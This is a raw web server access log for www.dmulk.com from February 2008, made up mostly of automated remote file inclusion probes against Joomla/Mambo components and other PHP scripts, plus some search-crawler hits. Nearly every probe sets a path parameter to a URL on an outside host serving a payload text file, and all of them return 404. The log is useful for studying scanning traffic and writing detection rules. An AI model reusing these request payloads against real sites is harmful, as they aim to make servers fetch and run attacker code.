87.117.225.155 - - [26/Feb/2008:10:54:15 -0800] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.152 - - [26/Feb/2008:10:55:34 -0800] "GET /megumi/?N=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:10:55:36 -0800] "GET /index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:10:56:00 -0800] "GET /index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.119.157.77 - - [26/Feb/2008:10:57:34 -0800] "GET /logs/access_080103.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.drivingcenter-baden.de/_grafik/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
85.119.157.77 - - [26/Feb/2008:10:57:34 -0800] "GET /logs/access_080103.log/errors.php?error=http://www.drivingcenter-baden.de/_grafik/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
74.6.28.233 - - [26/Feb/2008:10:57:49 -0800] "GET /presto/?N=D HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.193.222.218 - - [26/Feb/2008:10:58:04 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [26/Feb/2008:10:58:53 -0800] "GET //lazarusgb/admin.php?include_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
89.218.85.18 - - [26/Feb/2008:10:58:54 -0800] "GET /logs//lazarusgb/admin.php?include_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:10:59:09 -0800] "GET /logs/access_080121.log/send_reminders.php?includedir=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:10:59:09 -0800] "GET /send_reminders.php?includedir=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:10:59:09 -0800] "GET /logs/send_reminders.php?includedir=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:10:59:23 -0800] "GET /logs/access_080118.log/inc/cmses/aedatingCMS.php?dir[inc]=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:10:59:23 -0800] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:10:59:26 -0800] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:10:59:46 -0800] "GET /logs//lazarusgb/admin.php?include_path=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.45.242.50 - - [26/Feb/2008:10:59:47 -0800] "GET //lazarusgb/admin.php?include_path=http://csinfo.pl/includes/union/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
84.53.83.254 - - [26/Feb/2008:11:00:14 -0800] "GET /logs//lazarusgb/admin.php?include_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
84.53.83.254 - - [26/Feb/2008:11:00:14 -0800] "GET //lazarusgb/admin.php?include_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:11:00:24 -0800] "GET /index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.58.177 - - [26/Feb/2008:11:01:16 -0800] "GET /logs/access_080120.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
189.1.132.59 - - [26/Feb/2008:11:01:24 -0800] "GET /logs/access_080122.log/index.php?x=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
189.1.132.59 - - [26/Feb/2008:11:01:24 -0800] "GET /index.php?x=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
189.1.132.59 - - [26/Feb/2008:11:01:25 -0800] "GET /logs/index.php?x=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
82.165.180.214 - - [26/Feb/2008:11:02:02 -0800] "GET /logs/index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
82.165.180.214 - - [26/Feb/2008:11:02:03 -0800] "GET /index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:11:02:29 -0800] "GET /logs/access_080211.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:11:02:29 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:11:02:29 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.82.84 - - [26/Feb/2008:11:02:45 -0800] "GET /logs/access_080117.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.paradstars.com/en/sistem.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.23.73 - - [26/Feb/2008:11:02:56 -0800] "GET /logs/access_070909.log HTTP/1.0" 200 75478 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.115.89.60 - - [26/Feb/2008:11:03:10 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.89.60 - - [26/Feb/2008:11:03:19 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.89.60 - - [26/Feb/2008:11:03:27 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.0.252.2 - - [26/Feb/2008:11:03:58 -0800] "GET //lazarusgb/admin.php?include_path=http://www.freewebtown.com/shadow26/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
194.0.252.2 - - [26/Feb/2008:11:03:58 -0800] "GET /logs//lazarusgb/admin.php?include_path=http://www.freewebtown.com/shadow26/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
81.92.222.169 - - [26/Feb/2008:11:03:59 -0800] "GET /index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
81.92.222.169 - - [26/Feb/2008:11:03:59 -0800] "GET /logs/index.php?option=com_rsgallery2&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
83.149.90.29 - - [26/Feb/2008:11:04:29 -0800] "GET /logs//lazarusgb/admin.php?include_path=http://www.freewebtown.com/shadow26/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
83.149.90.29 - - [26/Feb/2008:11:04:29 -0800] "GET //lazarusgb/admin.php?include_path=http://www.freewebtown.com/shadow26/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
88.166.35.71 - - [26/Feb/2008:11:04:34 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.165.180.214 - - [26/Feb/2008:11:04:43 -0800] "GET /logs/index.php?option=com_rsgallery&Itemid=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
82.165.180.214 - - [26/Feb/2008:11:04:44 -0800] "GET /index.php?option=com_rsgallery&Itemid=&mosConfig_absolute_path=http://askastro.com/bo.do?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
81.92.222.169 - - [26/Feb/2008:11:06:09 -0800] "GET /logs/index.php?option=com_rsgallery&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
81.92.222.169 - - [26/Feb/2008:11:06:09 -0800] "GET /index.php?option=com_rsgallery&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
84.53.83.254 - - [26/Feb/2008:11:07:51 -0800] "GET /logs//lazarusgb/admin.php?include_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
84.53.83.254 - - [26/Feb/2008:11:07:51 -0800] "GET //lazarusgb/admin.php?include_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
67.28.112.245 - - [26/Feb/2008:11:08:34 -0800] "GET /Inc/cmses/aedatingCMS.php?dir[inc]=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.203.223.25 - - [26/Feb/2008:11:08:36 -0800] "GET //modules/xfsection/modify.php?dir_module=http://heidik.org/canar/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [26/Feb/2008:11:08:36 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.215 - - [26/Feb/2008:11:08:40 -0800] "GET /Config.php?path_to_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.233.6.152 - - [26/Feb/2008:11:10:05 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.152 - - [26/Feb/2008:11:10:05 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.152 - - [26/Feb/2008:11:10:05 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.233.6.152 - - [26/Feb/2008:11:10:05 -0800] "GET /logs/access_071119.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:11:10:34 -0800] "GET /logs/access_080120.log/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:11:10:35 -0800] "GET /logs/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.20.54.118 - - [26/Feb/2008:11:10:47 -0800] "GET /logs/access_071225.log/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.54.118 - - [26/Feb/2008:11:10:47 -0800] "GET /dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.54.118 - - [26/Feb/2008:11:10:47 -0800] "GET /logs/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.54.118 - - [26/Feb/2008:11:10:56 -0800] "GET /logs/access_071220.log/dministrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.96.156.153 - - [26/Feb/2008:11:11:51 -0800] "GET /logs/access_080201.log/index.php?pagina=http://www.geocities.com/giwel/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.30.216.107 - - [26/Feb/2008:11:12:22 -0800] "GET /logs/access.log HTTP/1.0" 200 389142 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.110.54.240 - - [26/Feb/2008:11:12:45 -0800] "GET /logs/access_080118.log/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.8.125 - - [26/Feb/2008:11:12:51 -0800] "GET /megumi/Necklace/?N=D HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.193.222.218 - - [26/Feb/2008:11:14:02 -0800] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.222.218 - - [26/Feb/2008:11:14:02 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.28.112.245 - - [26/Feb/2008:11:14:05 -0800] "GET /logs/access_071118.log/Inc/cmses/aedatingCMS.php?dir[inc]=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.245 - - [26/Feb/2008:11:14:05 -0800] "GET /Inc/cmses/aedatingCMS.php?dir[inc]=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.245 - - [26/Feb/2008:11:14:06 -0800] "GET /logs/Inc/cmses/aedatingCMS.php?dir[inc]=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.103.215 - - [26/Feb/2008:11:14:11 -0800] "GET /Config.php?path_to_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.103.215 - - [26/Feb/2008:11:14:12 -0800] "GET /logs/Config.php?path_to_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:11:14:25 -0800] "GET /plans/ HTTP/1.1" 200 1111 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
64.80.157.162 - - [26/Feb/2008:11:14:27 -0800] "GET /plans/sdgeorge/ HTTP/1.1" 401 395 "http://www.dmulk.com/plans/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.dmulk.com"
200.6.213.50 - - [26/Feb/2008:11:14:29 -0800] "GET //modules/Forums/admin/admin_styles.php?phpbb_root_path=http://horseshoebendarkansas.net/blog/nucleus/libs/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.60.207.171 - - [26/Feb/2008:11:14:58 -0800] "GET /logs/access_080117.log/index.php?mosConfig_absolute_path=http://flowflash.net/flash/media/var1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.171 - - [26/Feb/2008:11:14:58 -0800] "GET /logs/index.php?mosConfig_absolute_path=http://flowflash.net/flash/media/var1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [26/Feb/2008:11:15:17 -0800] "GET /logs/access_080122.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.103.215 - - [26/Feb/2008:11:15:19 -0800] "GET /logs/access_080108.log/Config.php?path_to_root=http://sda3.es/l3iba/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.75.5.220 - - [26/Feb/2008:11:15:24 -0800] "GET /logs/access_080120.log/admin.php?include_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [26/Feb/2008:11:15:25 -0800] "GET /admin.php?include_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.75.5.220 - - [26/Feb/2008:11:15:25 -0800] "GET /logs/admin.php?include_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.149.90.29 - - [26/Feb/2008:11:16:58 -0800] "GET /logs/index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
83.149.90.29 - - [26/Feb/2008:11:16:59 -0800] "GET /index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
200.54.224.250 - - [26/Feb/2008:11:17:04 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://preciousland.co.uk//////templates/yis.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.150.30.41 - - [26/Feb/2008:11:17:26 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.algebramovie.com/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.214.232 - - [26/Feb/2008:11:17:33 -0800] "GET /logs/access_080120.log HTTP/1.0" 200 585838 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
165.230.110.130 - - [26/Feb/2008:11:19:23 -0800] "GET //index.php?option=com_pcchess&Itemid=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
165.230.110.130 - - [26/Feb/2008:11:19:23 -0800] "GET /logs//index.php?option=com_pcchess&Itemid=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
74.6.26.119 - - [26/Feb/2008:11:19:28 -0800] "GET /funny/?D=D HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:11:19:34 -0800] "GET /logs/access_080118.log/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.234.108.168 - - [26/Feb/2008:11:19:34 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:11:19:34 -0800] "GET /logs/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.99.153 - - [26/Feb/2008:11:19:34 -0800] "GET /logs/access_080120.log/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.234.108.168 - - [26/Feb/2008:11:19:35 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [26/Feb/2008:11:19:35 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.77.40.74 - - [26/Feb/2008:11:19:42 -0800] "GET /logs/access_080122.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
82.77.40.74 - - [26/Feb/2008:11:19:57 -0800] "GET /logs/access_080122.log HTTP/1.1" 200 524288 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
82.77.40.74 - - [26/Feb/2008:11:20:09 -0800] "GET /logs/access_080122.log HTTP/1.1" 200 524288 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
82.77.40.74 - - [26/Feb/2008:11:20:16 -0800] "GET /logs/access_080122.log HTTP/1.1" 200 590794 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
82.77.40.74 - - [26/Feb/2008:11:20:27 -0800] "GET /logs/access_080122.log HTTP/1.1" 200 590794 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" "www.dmulk.com"
87.106.48.129 - - [26/Feb/2008:11:20:49 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.13.195.52 - - [26/Feb/2008:11:21:47 -0800] "GET /logs/access_080131.log/index2.php?p=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [26/Feb/2008:11:21:47 -0800] "GET /index2.php?p=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.13.195.52 - - [26/Feb/2008:11:21:48 -0800] "GET /logs/index2.php?p=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.25.34 - - [26/Feb/2008:11:22:17 -0800] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.98.25.34 - - [26/Feb/2008:11:22:18 -0800] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.103.76 - - [26/Feb/2008:11:22:27 -0800] "GET /logs/access_080118.log/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
